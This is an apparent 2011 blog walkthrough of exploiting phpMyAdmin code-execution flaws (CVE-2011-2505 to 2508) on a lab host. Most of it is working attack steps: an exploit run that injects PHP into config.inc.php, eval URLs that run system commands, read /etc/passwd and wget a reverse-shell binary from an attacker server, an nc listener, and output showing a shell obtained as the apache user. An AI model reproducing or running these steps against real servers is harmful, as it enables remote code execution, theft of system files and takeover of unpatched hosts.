Friday, 5 August 2011

phpMyAdmin Prior to 3.3.10.2 and 3.4.3.1 Multiple Remote Vulnerabilities



phpMyAdmin Prior to 3.3.10.2 and 3.4.3.1 Multiple Remote Vulnerabilities
Bugtraq ID: 48563
Class: Input Validation Error
CVE: CVE-2011-2505
CVE-2011-2506
CVE-2011-2507
CVE-2011-2508
Remote: Yes
Local: No
Published: Jul 05 2011 12:00AM
Updated: Jul 26 2011 10:10PM
URL : http://www.securityfocus.com/bid/48563/info

Hello all, this post will be a mix with an old post that I already did wish was "Deface using EVAL() function" + phpmyadmin Prior to 3.3.10.2 and 3.4.3.1.
PhpMyAdmin is prone to multiple remote vulnerabilities, including PHP code-execution and local file-include vulnerabilities.Successful attacks can compromise the affected application and possibly the underlying computer. So, lets test that. We have 2 exploits available.With the first one, we will make the eval option available for us to execute remote commands on the target machine.

php exploit1.php http://172.16.1.18/phpmyadmin
You should get something like this
[i] Running...
[*] Contacting server to retrive session cookie and token.
[i] Cookie:dkucqrelskbq2k8kd2ouive7rsb9t176
[i] Token:64d4cd9570888c981c127bdf47586d65
[*] Contacting server to inject code into the _SESSION[ConfigFile][Servers] array.
[*] Contacting server to make it save the injected code to a file.
[*] Contacting server to test if the injected code executes.
[!] Code injection successfull. This instance of phpMyAdmin is vulnerable!
[+] Use your browser to execute PHP code like this

http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=echo%20'test';

Great, that means it worked.
Now we apply what I explained before about EVAL().
Before you type all the commands, make sure your attacking server is ready for the reverse connection from the target machine. Type this in the attacking server:
nc -l -p 8080 -vvv

Ok, now lets go back to the browser and upload our shell to the server.

http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("ls -la /");
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("cat /etc/passwd");
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("wget -P /tmp http://172.16.1.79/exploits/airwolf_reverse_shell");
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("chmod 777 /tmp/airwolf_reverse_shell");
http://172.16.1.18/phpmyadmin/config/config.inc.php?eval=system("/tmp/airwolf_reverse_shell");

After you typed this last line, you go to the attacking server shell to see if the target server connected to you.
listening on [any] 8080 ...
172.16.1.18: inverse host lookup failed: Unknown server error : Connection timed out
connect to [172.16.1.79] from (UNKNOWN) [172.16.1.18] 53365


ls
config.inc.php
id
uid=48(apache) gid=48(apache) groups=48(apache)

Yeap, as you can see got our shell in the server.
Have fun ;)